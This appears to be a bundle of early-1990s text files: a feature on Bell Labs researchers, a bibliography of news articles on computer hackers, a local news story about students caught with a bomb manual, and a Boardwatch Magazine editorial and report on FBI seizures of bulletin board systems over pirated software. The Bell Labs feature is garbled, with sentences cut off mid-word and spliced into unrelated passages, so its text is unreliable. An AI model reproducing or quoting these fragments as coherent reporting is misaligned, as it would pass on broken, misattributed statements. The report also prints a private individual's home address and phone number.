   taking place -- he or she knows only that a complex job is getting
   done.
   
   I ask Dennis Ritchie about the operating system's curious name.
   Sitting in his tiny, cluttered office in Plan 9 Land, around the
   corner from the former Unix Room, he answers by rubbing his chin and
   repeating my question out loud. In his 50s, impish, bearded, and
   dressed down, Ritchie scrunches up hio big. It was an engineering issue to
   design more powerful features with a simpler code." The result,
   underway in 1988, was Plan 9.
   
   Ritchie is modest when he compares his hopes for the new operating
   system with the enormous impact of Unix. "The main effect of Unix, the
   portability of an operating system, can be done only once," he says.
   
   But Dennis Ritchie's unassuming description - he's trying hard not to
   scare the business types who are still calculating Unix's losses -
   belies the great excitement in Bell Labs about the potential for Plan
   9.
   
   Beginning this year, Bell Labs will be offering Plan 9 on CD-ROM, with
   source codes and manuals available to developers at a modest price.
   The idea, Ritchie suggests, is twofold. First, he says, "it is a way
   to get it out and make it visible." And second, "by making it more
   available outside, it will make it more credible inside."
   
   Plan 9's importance may be that it is an operating system designed
   from the start to allow computers and communications devices to work
   together in tandem. This, of course, advances AT&T's prime directive:
   complete the interoperability for more and more of the highly
   profitable "fat minutes" that come from the processing and transfer of
   broadband data, natu
   
   But perhaps the era of downsizing has had a discernible effect at the
   Labs. "It's possible," Cheswick says, "if you're bright enough, to
   spend the year fishing on a boat, then write a three-page paper, and
   get your salary.
   
   "But it's risky," he adds with thoughtful, practiced timing.
   
   These days, someone like Bill Cheswick is happy to avoid those risks,
   so delighted is he with his job and the encouragement Bell Labs gave
   him to write his book "on company time." Over a dessert of ice cream
   (a soda fountain's worth of flavors and toppings is kept in a nearby
   freezer), Cheswick spends a moment explaining the seemingly salubrious
   arrangement in which "you keep the royalties, and the company keeps
   the copyright."
   
   "It's a good deal," he notes.
   
   As are other perks, including his ability to acquire equipment.
   Cheswick, with only a BA, has the authorization to request "any kind
   of computer or software I want with less review than I have with my
   wife when we go shopping." He logs into a new $20,000 3430 Dual CPU
   NCR server to create extremely fast Internet security gateways. "I can
   cut as much rope as I want," he smiles, "and hang myself with it."
   
   Aside from the potential for scientific self-strangulation, Cheswick
   does have a few complaints with the current system. "We are part of
   the overhead," he explains. "Therefore, you get bean counters telling
   you, 'I'm paying a percentage of my profits for this, what am I
   getting?'" But in general, the prestige, salary, informality - today
   Cheswick is wearing a T-shirt, jeans, and sandals - and interesting
   assignments at Bell Labs make for an unusually contented and motivated
   work force.
   
   This includes those still huddled over chess as Cheswick excuses
   himself and walks out. As he passes, another hard-fought game is
   ending.
   
   "Nothing I can do," one of the players shrugs to his audience as he
   concedes ill travel in light pulses, each pulse
   moving as much as 40 billion bits a second. This is the equivalent of
   2.5 million simultaneous telephone conversations over a single strand.
   
   
   DiMarcello fingers a length of optical fiber: it looks like
   monofilament fishing line and can be tied into knots and still
   transmit bursts of photons, carrying a thick bandwidth of information,
   audio, text, or video. Millions of miles of such fiber-optic line will
   be required to fiber the nation. AT&T produces all of its fiber at
   just one specialized facility in Georgia. The race to develop faster
   lasers to pump more data over fiber-optic lines is matched by a
   separate race to speed up the fiber-production process.
   
   "We're using larger tubes to try to make 100 kilometers of fiber with
   each," says the thin, intense DiMarcello over the hum, as he picks up
   a 4-inch-thick-by-3-foot-long glass pre-form, looking vistol continues working his way through a
   demonstration of Bell Labs's SEPTEMBER Project. The nightmare of every
   online freedom fighter, Bell Labs's "Secure Electronic Publishing
   Trial" project offers the possibility of bringing the electronic
   network into the realm of laissez faire economics and making "pay per
   piece" electronic publishing possible.
   
   If electronic copywriting and producing online credit cards is his
   official raison d'tre, Kristol is more than happy to move on to
   demonstrate his real love - audio and video over the World Wide Web,
   into which AT&T has jumped with a vengeance. On his workstation,
   Kristol calls up a short video of AT&T chair Bob Allen giving a
   speech. It is being sent from a server at another Bell Labs campus and
   is part of what is known as "Nemesis," a network-friendly service that
   allows video and audio to be sent and viewed straight off a server as
   needed, rather than forcing a user to download an entire file first.
   
   Kristol is equally proud of the Bell Labs's version of Internet talk
   radio and the in-house "jukebox," a server on which various recordings
   are stored. He plays a portion of the radio series Hell's Bells: A
   Radio History of the Telephone, before getting to the pce de
   rsistance - over a speaker hooked up to Kristol's workstation comes a
   ghostly version of T. S. Eliot's signal poem, "The Wasteland." The
   solemn, late autumn sky outside K
   Belle, the Bell Labs's champion chess-playing computer, retired in the
   early '80s. There was a ping-pong playing robot, a marvel of
   trajectory plotting, fuzzy logic, and space/time coordination that was
   quietly ditched because scientists feared stockholders and rate payers
   might grow cranky with such seeming frivolity.
   
   Bellcore's Bob Lucky, who moved into Arno Penzias's spot when the
   latter was promoted to vice president of research, recollected an even
   closer-to-home example of AT&T's unease with nonproductive science.
   When Lucky inherited Penzias's office, he found a plaque made from an
   AT&T advertisement produced when Penzias and Wilson were awarded their
   Nobel in 1978. "What does a Nobel Prize have to do with your
   telephone?" the ad asked. The questions troubled Lucky. "It didn't
   ring true," he commented. "Why should you have to explain why the
   discovery was important, why it was good for the telephone?"
   
   It was an important question, and a difficult one for Penzias, who,
   although clearly sympathetic to the need for intellectual elbow room,
   seems compelled to tow the AT&T market-driven-technology party line.
   In a discussion about Bell Labs's grand dilemma, Penzias is almost
   wistful as he reflects on the Unix Room and the highly consequential
   results of just hanging out. "One doesn't know when it's best to
   work," Penzias says, his precise English touched by an accent
   somof our great luxuries," he admits,
   "is that we don't always have to be right."
   
   Another great advantage is that Bell Labs can invest in defensive
   research. "We don't want to be blindsided," he says, citing the
   example of a project investigating the neural nets of small animals to
   see if they are applicable to future chip design that more nearly
   approximates living intelligence. "Biology has a lot to teach us," he
   says. He also mentions some of the other marvels still pouring out of
   Bell Labs: the optical amplifiers and wavelength multiplexing
   technology that will broaden bandwidth to unimaginable degrees; the
   revolutionary digital-audio compression algorithms; the optical
   trapping technology that allows levitation and precise manipulation of
   matter down to the molecular level; the new type of semiconductor
   laser, the quantum cascade, able to emit light at fantastically
   specific wavelengths; and even the newly created lead-free brass
   alloy. Then there are the Nobel Prize winners of the future.
   
   But, finally, Penzias is a realist when it comes to assessing Bell
   Labs's role. "We're filling in a piece of the technology puzzle, an
   important piece but one not as grand," he says. Still,twork thrusts were not
   dominating attention, activity, or money as they are today. All of
   them are getting more funding. And in each, software is a key.
   
   Are there fundamentals that underpin all of those areas?
   
   They all involve developments in user interface. If you look at the
   history of these networks, you'll see that they were preceded by the
   invention of a user interface. Before there were telephone networks,
   somebody had to invent the telephone; before there were cellular
   networks, someone had to invent two-way radio handsets; before LANs,
   the PC had to come along; and before a new age in which broadband and
   wireless will allow networks to take off, someone will have to come up
   with new user interfaces. There are two other fundamentals: silicon
   and software.
   
   The AT&T ad that was done after Penzias and Wilson became Nobel
   laureates in 1978 asked the question "What does a Nobel Prize have to
   do with your telephone?" What is the answer to that question?
   
   Most technological advances that profoundly affect people's lives
   have, at their root, changes in the basic sciences. At Bell Labs, we
   have a dual obligation and also a dilemma: to make fundamental
   contributions for the betterment of all, and also to use technology
   for AT&T's competitive advantage in the marketplace.
   
   How do you do good and also do well?
   
   We need to do a better job getting that technology to market. You have
   to differentiate between invention and innovation. Invention is a
   wonderful quality of uniquely brilliant people but does not
   necessarily turn into real products and services. Innovation is
   getting technology to the marketplace. Never has there been an
   opportunity for technology to have such an impact around the world. If
   innovation is being able to get invention to the marketplace, then the
   golden age is still ahead of us.

                Computer Hackers News Articles
                         Compiled By
                          Bob Krause
                   KRAUSER@SNYSYRV1.BITNET

     The following is a list of articles that I have found concerning the
computer underground in various magazines and news-papers. The list is in
chronological order. If you know of an article that should be included in
this list or correction, send me the information and I will add it to the
listing.

Nov 18  '90  Crackdown on computer crime is raising question of computer
             rights.
             Chicago Tribune pg.17
Oct 29  '90  Users paying big price for PBX fraud.
             Network World pg.1
Oct 28  '89  Halting hackers.
             The Economist pg.18
Oct 15  '90  Target: The Corporate PBX
             Information Week pg.24
Sept 9  '90  Can invaders be stopped but civil liberties upheld?
             The New York Times pg.F12
Sept 1  '90  United States v Zod
             The Economist pg.23
Sept    '90  Digital Desperados; hackers indictments raise constitutional
             questions.
             Scientific American pg.34
Aug 26  '90  The rights of computer users.
             Los Angles Times pg.D9
Aug 22  '90  Open sesame; in the arcane culture of computer hackers, few
             doors stay closed.
             The Wall Street Journal pg.A1
Aug 20  '90  NY State Police round up hackers.
             Computerworld pg.99
Aug 17  '90  U.S. Arrests boy, 5 others in computer hacker case.
             The Wall Street Journal pg.82
Aug 6   '90  Computer anarchism calls for a tough response.
             Business Week pg.72
Aug 6   '90  Charges dropped against alleged BellSouth hacker.
             Telephony pg.12
July 30 '90  Hacker trial begins in Chicago.
             Computerworld pg.8
July 30 '90  'Hacking' crackdown is dealt a setback in trial in Chicago
             The Wall Street Journal pg.B3
July 21 '90  Crackdown on hackers 'may violate civil rights'.
             New Scientist pg.22
July 21 '90  Group to defend civil rights of hackers founded by computer
             industry pioneer.
             The Wall Street Journal pg.B4
July 10 '90  Group to fight for computer users' rights.
             Los Angles Times pg.D5
July 10 '90  Computer hackers plead guilty in case involving BellSouth.
             The Wall Street Journal pg.84
July 2  '90  Hackers of the World, Unite!
             Newsweek pg.36
May 21  '90  Throwing the book at computer hackers.
             Business Week pg.148
May 14  '90  Justice failed in refusing to make Morris an example.
             Computerworld pg.23
May 14  '90  Morris sentence spurs debate.
             Computerworld pg.128
May 14  '90  Wheels of justice grind to a halt in 'worm' case.
             PC Week pg.16
May 7   '90  Three-year probation for Morris.
             Computerworld pg.1
May     '90  Just say No
             Communications of the ACM pg.477
May     '90  Uncovering the mystery of Shadowhawk.
             Security Management pg.26
Apr 30  '90  The hacker dragnet: the Feds put a trail on computer crooks -
             and sideswipe a few innocent bystanders.  Newsweek pg.50
March 26'90  Internet interloper targets hacker critics.
             Computerworld pg.127
March   '90  Cyber Thrash
             SPIN pg.24
March   '90  Is Computer Hacking a Crime?
             Harper's pg.45
Wntr    '90  Comp. crime and the Computer Fraud and Abuse Act of 1986
             Computer Law Journal pg.71
Feb 19  '90  Morris code.
             The New Republic pg.15
Feb 12  '90  Alleged hackers charged wit theft of BellSouth 911 data.
             Telephony pg.10
Feb 12  '90  Babes in high-tech toyland nabbed.
             Computerworld pg.8
Feb 11  '90  Revenge on the nerds; sure, jail our hackers - who needs
             software stars anyway?
             Washington Post pg.C5
Feb 9   '90  Hacked to pieces.
             New Statesman and Society pg.27
Feb 2   '90  Prevention is better than cure.
             Public Finance and Accountancy pg.9
Jan 5   '90  Computer hacking: is a new law needed.
             Public Finance and Accountancy pg.7
Feb 7   '90  Four charged with scheme against phones.
             The Wall Street Journal pg.B5
Dec 4   '89  Hackers: Is a cure worse than the disease?
             Business Week pg.37
Sept    '89  Free the hacker two.
             Harper's Magazine pg.22
June 19 '89  Hacker invades So. Bell switch.
             Telephony pg.11
June    '89  Consensual realities in cyberspace
             Communication of the ACM pg.664
Apr 3   '89  Strong scruples can curb computer crime.
             Computerworld pg.100
March 9 '90  Hackers revealed as spies.
             Nature pg.108
March 6 '89  Are ATM's easy targets for crooks?
             Business Week pg.30
Feb 20  '89  Prison term for first U.S. hacker-law convict.
             Computerworld pg.1
Jan 9   '89  Hacker prosecution: suspect held, denied phone access by
             district court.
             Computerworld pg.2
Jan 9   '89  Drop the phone: busting a computer whiz.
             Time pg.49
Dec 26  '88  The Cyberpunk
             People pg.50
Dec 11  '88  Computer intruder is urged by authorities to contact the
             laboratory he invaded.
             The New York Times pg.24
Nov 14  '88  Portrait of an artist as a young hacker.
             Computerworld pg.6
Nov     '88  Robopsychology
             Omni pg.42
Aug 1   '88  Is your computer Secure?
             Business Week pg.64
Apr 28  '88  Hacker runs rings around military security.
             New Scientist pg.25
April   '88  Computer hackers follow Guttman-like progression.
             Sociology and Social Research pg.199
Oct     '87  Brian Reid, A Graphics Tale of a Hacker Tracker
             Communications of the ACM pg.820
April   '86  Positive Alternatives: A report on an ACM Panel on Hacking
             Communications of the ACM pg.297
Jan     '84  Hacking away at morality.
             Communications of the ACM pg.8

   


               *Student Disciplined for Bomb Manual*
                -----------------------------------

Collinsville Herald-Journal
3/21/93-Pg. 7-A

  Martin Richter


   Three Collinsville High School Students were disciplined 
after one was caught reading a bomb-makeing manual in class-a 
chilling reminder of just how easy information on bomb makeing
is to come by.

   The proliferation of such information has been a topic of 
conversation in the wake of the bombing of the Trade Center
in New York.In published reports,investigatorshave said they 
found bom-making manuals in apartments of suspects raided 
after the bombing.

   Collinsville Det. Bob Vecchetti who handled the case,said a
16-year-old student who recently transferred to CHS from out 
of state had gotten the information from a computer network and 
brought it here.

  "That's what the one teenager said.",Vachetti said."He likes 
computers,and he found the printout,and he printed out the
literature."

   "The three just handed them from one to the other,just for
reading material.The third kid brought it to school and was caught
with it."

   Vechetti said it appeared that the three students had no intention of 
building a bomb,and had the information mainly out of curiosity.

  "Basicly we gave them a lectureon why they shouldn't readthat type of 
material,"he said."that's the wrong kind of curosity,in my opinion."

   He said the information was "a pretty good sized pamphlet" containing
at least 20 different catagories of bombs.

   Police Chief John Swindlee said he has always been concerned about how
easy it is to obtain information on bomb makeing.

   "From past experiance,i know that type of thing is easily available in
bookstores,"Swindle said."I don't think it's very difficult to get a book 
on it...I don't like to see books like `The Anarchist Cookbook' where they 
into detail on how to hurt people."

    But he added that haveing such information is not against the law.

    "There's nothing we can do locally,with the First Amendment,"he said.
The world Trade Center blast has reminded Americans that they arn't immune to
terrorism in the United States.While Collinsville obviosly is not high
on terrorisms' list of targets,Swindle said it isn't inconceivable that 
there could someday be an incident in this area.

     "Our biggest danger,I would think,would be that we would accidently
come on contact with these people,with the interstate highways and the
motels here- maybe stop them for something like that,"Swindle said.

      Swindle recalled an incident a year or two agoin which a powerfull
pipe bomb was used to blow up some mailboxes here.And he remembered 
responding to a suicide at a local motel when he was still a detective,
when a small box wit ha button on it was found next to the body.
   "Fortunately i didn't press the button,"Swindle said."It was rigged to
a pipe bomb under the bed.
(END)



                                                                       $3.95

         B  O  A  R  D  W  A  T  C  H      M  A  G  A  Z  I  N  E

                   Guide to the World of Online Services

 
 Editor: Jack Rickard   Volume VII: Issue 4    ISSN:1054-2760      April 1993
 

              Copyright 1993 Jack Rickard - ALL RIGHTS RESERVED

 Boardwatch Magazine is published monthly in printed form at an annual
 subscription rate of $36. In most cases, the operator of the local system
 carrying Boardwatch Online Edition can process your subscription order.
 Editorial comment may be addressed to Editor, BOARDWATCH MAGAZINE, 7586 West
 Jewell, Suite 200, Lakewood, CO 80232. (303)973-6038 voice, (303)973-4222
 data, (303)986-8754 fax. 

               SUBSCRIPTION VOICE ORDER LINE - 1-800-933-6038

 The April issue of Boardwatch Magazine included several articles on legal
 issues of importance to the BBS community.  This has led to the largest 
 number of requests for reprints in the six-year history of Boardwatch 
 Magazine and hundreds of requests from BBS operators for permission to 
 repost the editorial and article on the seizure of Rusty & Edie's BBS.
 As a service to the online community, we have extracted these particular
 articles of interest in this file.  You may freely distribute this file on
 bulletin boards and online information services, without restriction.

 Jack Rickard
 Editor


 ==============
 EDITOR'S NOTES
 ==============

 IT'S AGAINST THE LAW
 --------------------

I don't condone software piracy. I'm not one of those that believe everything
should be free. I know too many people who spend their nights trying to
puzzle out their next piece of code, and none of them resemble Bill Gates
very closely. Most are like Bob Fairburn, trying to put together a little
thing done well, do what they love, and eeek out a living doing it. More
generally, nothing comes from nothing, and without economic legs, little in
this world advances very far, or has much impact.

I also confess some reticence regarding the topic of pornography. I
personally don't even take the Sports Illustrated swimsuit issue, and I
generally shower in the dark. Photos of fat chicks with donkeys don't do any
more for me than they do for the donkey, and frankly, some of the images I
have had the privilege of viewing online would make even the donkey blush. I
don't find any lofty position posturing for "freedom of speech or
expression", artistic merit, or anything else in photo-images involving
little girls, animals, or graphic depictions of homosexual acts. Despite the
howls of rage from the terribly concerned, I find no high ground to take on
this issue not already staked out by someone braying with less intelligence
than the donkey could possibly muster.

And while it is a very small cut of what goes on in cyberspace, it does go
on. There are victims. Not terribly directly. And they are not terribly
damaged. But there are the issues of crime and victim, and we should deal
with them in an appropriate degree through the existing apparatus of law.

There is also the concept of a level playing field. BBS operators who work
within established legal and business norms are immediately put at a
competitive disadvantage when some BBS operators decide the law does not
apply to them. The nature of callers being what it is, a BBS offering
commercial software freely for download, or offering clearly obscene
materials online, will find an audience pretty quickly. Reaching 100 lines in
just a few years is quite a task for those playing by the rules.

All that said, we've got a problem. It goes to the heart of a basic sense of
dishonesty among our law enforcement apparatus. And it's becoming awkwardly
difficult to tell the criminals from the police. The current mode is to use a
poorly thought out law intended for mobsters and drug kingpins to seize
computer equipment of bulletin boards and other businesses suspected of
information crimes. In most cases to date, these seizures have not resulted
in criminal charges.

Whenever called to task on this topic, the FBI, Secret Service, and local law
enforcement invariably harp that they were simply gathering evidence as part
of the investigation. This is so disingenuous as to be criminal. They don't
normally even have the courtesy of hiding their  posture on this topic. It is
a planned campaign of terror intended to frighten BBS operators into
compliance by the threat of an electronic and economic death penalty. The
problem with this, and the very reason our founding fathers barred such
activity as part of our Constitution, is that it is all too easy to get the
wrong man. And the system further then becomes subject to political or
economic motivators inappropriate to a system of justice.

Personal computers are not simply evidence gathering machines. They've become
so central to the operation of bulletin boards, publishers, software vendors
and developers, and many other businesses, that seizing them constitutes a
sentence of economic bankruptcy - from the minute the seizure is made.

There is a principle established by our founding fathers in their
Constitutional compromise that was quite explicit in that a resident of these
United States is held to be innocent until proven guilty and adjudged to be
so by a jury of his peers. In theory, you can be caught red handed running a
lawn mower over piles of human bodies stacked on your front lawn and an FBI
agent or policeman can't find you "guilty" of anything by themselves. They
can detain you on suspicion and present you for prosecution. In fact, judges
cannot actually find you guilty of criminal wrong doing under our system of
justice. Twelve of your uninterested neighbors who are NOT professionally
part of the system have to agree that you are indeed guilty before our system
can mete out a punishment. This current practice of seizing equipment under
color of search warrant abrogates all the protections built into our
Constitutional form of government to preclude this. As such, they constitute
not merely a procedural faux pas, but treason.

The Steve Jackson Games Trial illustrates the mockery made of our legal
system by bumbling, ignorant law enforcement officials who very nearly put
this man out of business by breaking into his office, stealing all his
equipment and business records, and there was NEVER a charge filed against
him. Indeed, the investigation leading to this ridiculous activity has all
the appearance of a mistake. He's not only innocent of all charges, there
WERE NO CHARGES and indeed he was apparently not only the wrong guy, it was
even the wrong BBS. They were looking for ANOTHER BBS that used the same WWIV
software in the same city.

The government's main defense in this case actually appears to be that they
were unaware of the Privacy Protection Act, unaware that Steve Jackson Games
was a publisher, and that anyway the seizure brought the company media
attention and it was HELPED by the publicity. This would all be evil if there
were anyone in charge of this with enough sense to have had a design. The
lame protestations of the defense in this civil trial finally even turned the
judge livid.

And it doesn't stop there. On Saturday, January 30, Russell Hardenburgh had
all the equipment it took him years to purchase, and I would think years just
to wire together into a 124 line BBS, seized and hauled away. He has a very
difficult task rebuilding a business he's been building since 1987. That he
made copyrighted software available on this system is quite likely, indeed it
was viewed as the biggest open secret in the BBS community, and most BBS
operators thought something ought to be done about it. But as of this
writing, he hasn't been charged with anything at all. He has already lost his
BBS and his 14,000 subscribers are likewise out in the cold - BEFORE any
charges have been brought. If the man had been pureeing neighborhood kids in
the kitchen blender he would have at least had a trial before beginning his
sentence.

Similarly Joey Jay had his 32-line system hauled away from his Chesterfield
Missouri home on January 15, again by the FBI, on allegations of pornographic
images. They threatened his FATHER with seizure of his HOUSE and the man
subsequently threw his son out into the street. Jay lost his BBS AND his
HOME. I would guess from talking to him that Jay DID have such images online.
And that may in fact be illegal. But it doesn't appear we'll ever know. There
were no charges filed. The penalty was again levied BEFORE the process was
even begun.

We don't know that these two men are guilty. We don't know that they are not.
We will quite likely NEVER know because it's unlikely they will ever be
charged. Their computers were arrested. And it's striking fear in the hearts
of computers everywhere. If this were due to mistakes, it would be one thing.
But it isn't. It is part of a planned and executed design to enforce law by
not enforcing it. To simply arrest equipment, forego the expense and bother
of a trial, and let the victims serve as "examples." If anyone questions
this, they innocently claim to simply be gathering evidence - knowing full
well they've already sentenced the suspect to bankruptcy.

Not only have the lives and livelihoods of all of these individuals been
irretrievably damaged, but large numbers of people who used these systems
have found their correspondence has become the property of the government,
that government agents are pouring over their private electronic mail, and
that their right to assemble and to communicate has not been abridged, it has
been abrogated in its entirety - without acknowledgement, notice, or
explanation.

Through the gross misapplication of existing evidenciary practices, federal
law enforcement officials have basically abrogated their responsibility to
enforce laws at all. They are not charging lawbreakers, they are not
prosecuting law breakers, they are RUINING individuals who they have reason
to believe MIGHT be breaking the law - often on terribly thin allegations.
They have taken on the role of judge, jury, and executioner largely because
it is inconvenient and expensive to learn the technology and make their case
in court. So they cunningly just use the evidence gathering function to
deliver the punishment and to hell with the rest of the process.

And that is no law at all. It is a crime. Not a small crime. And not a
victimless crime. It is a crime of treason against the state, against our
nation, against our citizens, and against our way of life. And it is a crime
all out of proportion to crimes of copyright infringement or donkey
pornography. Realistically a fine and some community service would likely
cover the donkey and the grevious harm done Novell. Treason and the designed
overthrow of our Constitutional form of government is generally held to be
more serious.

As we sit, on any allegation from virtually anyone that wishes you ill, our
government can, and in fact may, break down your door, take your computer
equipment and business records, and disappear in the night with virtually no
explanation and it will take you years of legal effort and hundreds of
thousands of dollars to ever retrieve it. It is a peculiarity of our
technological age that this act is virtually an airtight assurance of your
bankruptcy. By the time you get your day in court, if you are wealthy enough
to afford it, the business you worked for years to build will have been long
gone.

You may be guilty yourself of a crime. You may not. It may never come up. On
the signature of a bureaucrat so ignorant he can't list a file directory, you
can be ruined. And there are enough cases of it happening already that this
is no longer an abstract theory. It is happening and has happened repeatedly
within the last 45 days. It is happening by design. They are proud of it. And
they fully believe that they not only are above the law, but that they ARE
the law.

None of this falls within the powers we as a people have granted the state -
ever. Our representatives didn't do it by "mistake." A small group of
bureaucrats who have made a life of snuffling up to the public trough for a
living have taken it upon themselves to do this thing - mainly because it's
easy, and because it works - and because nobody has yet yelled booger.

I do not concur with those who treat this situation as something requiring
education and conciliation. I have no reason to believe we need to establish
"credibility" with our legal system. It has to establish credibility with us.
At this point, they seem to seek control by a rule of fear and intimidation -
a tactic outside our system of law.

It is the ultimate irony of our time that in a period where totalitarian
governments all over the face of the planet are folding their tents in
failure, our nation seems bent on establishing their own as if it were all a
new idea. Copy all the software you like. Titillate yourselves till your eyes
bleed with goofy bit-images. No matter how you arrange the pixels, as
criminals, you're all small timers compared to the felons and traitors behind
the badge.

Bill Clinton probably doesn't read all his e-mail at
75300.3115@compuserve.com. But somebody will have to. And your elected
representative in Washington would be a good follow up. They won't know
there's a problem if you don't tell them. It's a sure bet the SPA is unlikely
to carry the torch for you. There's twelve million of you online. And if you
don't want to have to apply for the government's permission for every
tagline, we'd better get in motion.

Booger.

 Jack Rickard
 Editor Rotundus


 ===============================================
 FILES FROM THE FBI - BULLETIN BOARDS AND BADGES
 ===============================================

 RUSTY & EDIE'S BBS SEIZED BY THE FBI
 ------------------------------------

Rusty & Edie's BBS touted the fact that they had only two rules: 1. Have fun
and 2. No More Rules. It would appear they are going to soon add a third rule
to their operation - No Commercial Software.

After several years operating as the biggest open secret in BBSland, the 124
line BBS operated from the home of Russell And Edwina Hardenburgh in Boardman
Ohio was raided by the FBI. On Saturday afternoon, January 30, FBI agents
presented Rusty with a search warrant. Approximately 130 personal computers,
modems, LAN cabling, software packages, and subscriber records were seized as
evidence and hauled away - essentially terminating all operations.

Claiming some 14,000 subscribers to a system sporting a registration fee of
some $89 per year and 124 access telephone lines, Rusty & Edie's was one of
the nation's largest bulletin board systems. They claimed some 3.4 million
calls since going online and were receiving some 4000 calls daily when the
system went offline. The system featured over a 100,000 shareware files on 19
Gigabytes of file storage. They were charged with distributing copyrighted
commercial software on their BBS. And while the Software Publishers
Association (SPA) was quick to step forward and take credit for the FBI
action, it was actually quite late on the scene with this one. And therein
lies a tale.

Five years ago, Bob Fairburn had a heart attack. A restaurant manager in
Kansas with a wife and children, Fairburn could not obtain life insurance and
was assured by doctors that he had a life expectancy of five years or less.
He pondered for months on how he could somehow assure his family an income
after his death. And he decided that there were two things a man could do in
America to generate ongoing income - write a book or invent something.

So he set out to write the Great American Novel. After months of effort, he
read through his manuscript and decided even he wouldn't buy it. So he cast
about for something he could invent. But again, he found he just didn't have
the inspiration to be an Edison. His son had a small personal computer and
was already writing games in BASIC. Fairburn took a look at it and decided
this was something he could do.

He bought every book he could find on computer programming, and he signed up
on Bob Mahoney's Shorewood Wisconsin EXEC-PC BBS. He downloaded hundreds of
files from the BBS containing code fragments, examples, programming
tutorials, and anything he could find on programming. Starting in BASIC, he
eventually moved on to PASCAL. And he came up with an idea for a program. He
called it HOME DESIGNER and it was basically a simple CAD package to design
home floor plans, place and arrange furniture, and try out various designs
for your home or office.

Fairburn decided shareware wasn't the way to go to generate cash. So he
solicited software distributors for months. Eventually, a company in Florida
called Expert Software picked up the title and launched Expert Home Design -
at the staggering price of $14.95 retail.

According to Fairburn, he only gets fifty cents for each copy sold, but the
program caught on and he reached the point that he was making a living. He
bought a farm outside of Leavenworth Kansas and to get needed physical
exercise, began clearing it and converting it into a wildlife park. He hired
an assistant, and continued software development.

About a year ago, he dialed his old haunt at Bob Mahoney's EXEC-PC BBS, and
there was his commercial software program listed in the download directory
with BBS callers downloading it madly. Stunned, he called Bob Mahoney voice
and asked him about. Mahoney immediately apologized and removed the file from
the directory. In examining the file, they found a small file in it
advertising that it came from Rusty & Edie's BBS. Mahoney explained that
sometimes callers are confused by the difference between shareware software
and commercial software and in an effort to contribute something, they upload
commercial software to bulletin boards sometimes without realizing the
impact. "Most BBS operators will remove it immediately if you call their
attention to it," Mahoney assured him.

So Fairburn dialed Rusty & Edie's BBS and did indeed find his program
available for download there as well. He selected the editor and began
drafting a message to the sysop explaining the situation and asking that the
file be removed. According to Fairburn, while he was typing the message,
Rusty broke into real-time chat and rather rudely told him that he wasn't
responsible for every file that anybody uploaded to the BBS, that they
received megabytes of file uploads each day, and that he would remove the
file whenever he felt like it and got around to it.

Despite the harsh tone, Fairburn accepted this explanation. But when he
called a week later, the file was still there.

"Understand," explains Fairburn, "I'm not Bill Gates. I only get fifty cents
per copy sold, and my family depends on this for a living. This guy was
running a giant bulletin board and taking in lots of subscriptions, and
basically he was stealing my software. I just got mad about it."

Fairburn called the FBI office in Kansas City and complained. They were quite
nice but not very helpful during the call. But about a month later, Fairburn
answered a knock on the door to find an FBI agent on the front porch - there
to investigate his problem. Fairburn took the agent into the den and logged
onto Rusty & Edie's BBS. They logged the session to disk and he showed him
not only his own program in the directory, but copies of Borland's Software,
Novell's LAN software, a number of Microsoft programs, Quicken, and according
to Fairburn, "virtually every commercial game program made."

Fairburn was discouraged to learn that the agent knew nothing about
computers. But he gave him a disk with the logged session on it, some files
they actually downloaded, and a copy of PKZIP so he could extract the files.
He patiently explained what PKZIP did, and why it needed to be done. The
agent thanked him and left - telling him they would turn it over to their
Cleveland office.

Last October, nearly six months after the initial contact, the FBI contacted
Fairburn to ask if he would be willing to fly to Ohio at their expense to
testify against the Hardenburgh's in the event they decided to prosecute the
case. Fairburn agreed as long as they would cover his travel expenses.

He had also notified the publishing company that distributed his software.
And apparently they did contact the SPA. The FBI had apparently contacted
several of the other software vendors whose programs were found in the log
files, and they had in turn contacted the SPA - ergo the SPA involvement.

On January 30th, the FBI served a search warrant on Rusty & Edie's BBS, and
essentially trucked it away - an estimated $200,000 worth of computing
equipment.

The bust has evoked mixed reactions online. While the eternally concerned on
the Internet were outraged by the Constitutional implications, competing BBS
operators were not quite so adamant. According to Kevin Behrens of Aquila
BBS, a 32-line PCBoard system in Chicago, "Rusty Edie's was the worst-kept
secret in the industry. I don't know if it's a shame or about time."

Bob Mahoney of EXEC-PC was a bit more direct. "In some ways, this is a
competitive situation and every honest sysop is at a disadvantage. Imagine
operating a car wash with a competing car wash across the street. The
difference is that they give away a $20 gold piece with each car wash, but
you aren't allowed to because it is against the law."

Mahoney went on to note, "There's also something a bit annoying about
computer people (BBS operators) ripping off other computer people (software
authors). It's a bit like cannibalism within the family. I have a problem
with that."

Hardenburgh refused to comment on the situation noting the usual advice of
his lawyer not to discuss the case. "I will say I never thought something
like this could happen in America and I'm shocked and very disappointed."
Hardenburgh vowed to have the system back up on new equipment by March 1 at
the (216)726-1247 number, and expressed his hope that "his caller base would
back him on this one."

"When this is all over, I want to come out to that ONE BBSCON in Colorado and
tell you all an earful. You're not going to believe what can happen to a
BBS," vowed Hardenburgh.

The situation may be further complicated by a recent change to the copyright
law, ostensibly driven by the SPA. On October 28, 1992, the 102nd Congress
passed Senate Bill 893 - which became Public Law 102-561 revising Title 18 of
the United States Code. Under Section 2319(b) of title 18, the criminal
penalties for copyright infringement were dramatically changed. Previously,
anyone making 1000 copies or more of a copyrighted work were eligible for the
maximum penalty. Under the revision, that is reduced to anyone making 10 or
more copies with a retail value exceeding a total of $2500 or more within a
180-day period. If found guilty, they may be subject to sentences of up to
five years and fines of up to $250,000.

As of this writing, Hardenburgh has not been charged with any crime. Thomas
F. Jones, Cleveland special agent-in-charge noted in a statement that the
Youngstown FBI did serve a search warrant on Hardenburgh's home January 30th.
The warrant alleges the couple illegally distributed copyrighted computer
software programs to bulletin board subscribers without permission of
copyright owners. There was apparently no implication of pornography.

And Fairburn? Well, he's exceeded his five year projected life span and seems
to be doing reasonably will from a cardiac perspective. He did drop a piece
of a tree on his arm with a loader in January and has a bit of a problem with
his arm. But his Expert Home Designer was extremely well reviewed in the
After Hours column of PC Magazine's August '92 issue, and while at $14.95
it's not one of the big dollar generating software packages, numerically it
is the 17th fastest selling software package in America. It's discounted to
as little as $7.95 in grocery stores and apparently the country wants to
rearrange their furniture on screen. The program is available from Expert
Software, PO Box 143376, Coral Gables, FL 33134; (800)759-2562 voice;
(305)443-3255 fax. Bob Fairburn can be reached at 1004 2nd Ave., Leavenworth
KS, 66048; (913)651-3715 voice.

Other BBS operators are concerned by the implications of the raids.
